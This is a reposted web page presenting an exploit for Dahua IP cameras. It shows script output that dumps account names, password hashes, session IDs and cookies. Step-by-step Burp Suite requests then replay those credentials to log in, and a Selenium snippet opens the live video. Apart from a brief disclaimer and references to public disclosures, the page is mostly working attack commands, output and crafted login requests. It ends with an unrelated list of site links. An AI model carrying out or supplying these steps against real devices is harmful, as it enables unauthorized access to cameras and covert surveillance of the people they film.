exploit
来源:互联网 发布:淘宝网下载2015新版 编辑:程序博客网 时间:2024/04/29 13:06
Exploit Code
Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video.
$ python exploit_dahua.py 192.168.1.103[*] http://192.168.1.103/current_config/Account1 - 3 users('username:', u'admin')('password:', u'C580B3BD6C91A2349AA49B1E76DE70D3')('session:', u'1927849572')('session_password:', 'DBA284AF02A8108CE34F4AD38ED99B68')('seeeion_cookie:', 'DHLangCookie30=SimpChinese;DhWebCookie=%7B%22username%22%3A%22admin%22%2C%22pswd%22%3A%22%22%2C%22talktype%22%3A1%2C%22logintype%22%3A0%7D%3B;DhWebClientSessionID=2129659796')('username:', u'default')('password:', u'F510910D07096DE8766775A4805FBB13')('session:', u'826187816')('session_password:', '9333F4C182F3F5E265ED280AA9E5DBDF')('seeeion_cookie:', 'DHLangCookie30=SimpChinese;DhWebCookie=%7B%22username%22%3A%22default%22%2C%22pswd%22%3A%22%22%2C%22talktype%22%3A1%2C%22logintype%22%3A0%7D%3B;DhWebClientSessionID=1156207906')
How to login dahua camera with burpsuite ?
Please use the exploit.py to get username/password/sessionid/cookies , and we will use it in burpsuite.
Please access dahua default page. ex: http://192.168.1.103/.
Tamper http request with burpsuite. If you input username/password, and click the submit button. Burpsuite will receive the http request body.
POST /RPC2_Login HTTP/1.1Host: 192.168.1.103User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0Accept: text/javascript, text/html, application/xml, text/xml, */*Accept-Language: en-US,en;q=0.5Referer: http://192.168.1.103/X-Requested-With: XMLHttpRequestX-Request: JSONContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 102Cookie: DHLangCookie30=SimpChineseConnection: close{"method":"global.login","params":{"userName":"admin","password":"","clientType":"Web3.0"},"id":10000}
Send the request in burpsuite. Burpsuite will handle the second http request as follow. Please attention here, we need to replace the following parts:
- Cookie
- Post body - session
- Post body - password
POST /RPC2_Login HTTP/1.1Host: 192.168.1.103User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0Accept: text/javascript, text/html, application/xml, text/xml, */*Accept-Language: en-US,en;q=0.5Referer: http://192.168.1.103/X-Requested-With: XMLHttpRequestX-Request: JSONContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 154Cookie: <****replace-here****>Connection: close{"method":"global.login","session":<****replace-here****>,"params":{"userName":"admin","password":"<****replace-here****>","clientType":"Web3.0"},"id":10000}
and then everything goes well. We’ll see the camera monitor panel.
If you want to view the video automatically, please try yourself:
from selenium import webdriverwdpath = "/path/to/chrome_webdriver"chrome = webdriver.Chrome(wdpath)chrome.add_cookie(cookies)chrome.get('http://{}/'.format(host))
References
- http://www.freebuf.com/news/128963.html
- http://seclists.org/fulldisclosure/2017/Mar/9
- https://ipvm.com/reports/dahua-backdoor?code=bash
- exploit
- exploit
- Exploit
- Exploit
- VBS.Exploit
- ani exploit
- 什么是exploit
- ms08069 exploit
- exploit search
- 什么是exploit
- explore exploit
- sharepoint exploit
- exploit search
- badusb exploit
- netforce exploit
- js exploit
- 注入exploit
- exploit - write metasploit exploit script
- 晒CSDN博客编辑时遇见的一个小问题!求大神解释!
- IRP 同步IO、异步IO及延迟IO完成
- 对称二叉树
- 获取线程名
- [Haskell] Module
- exploit
- git的日常使用
- JS实现去除一个字符串中的所有标点和空格
- tolua 框架 c# 调用 lua 过程 笔记
- swiper 手机移动端页面循环
- iOS二维码扫描
- C语言---大数相加
- Java线程池ThreadPoolExecutor深度探索及源码解析
- Ogre中绘制平面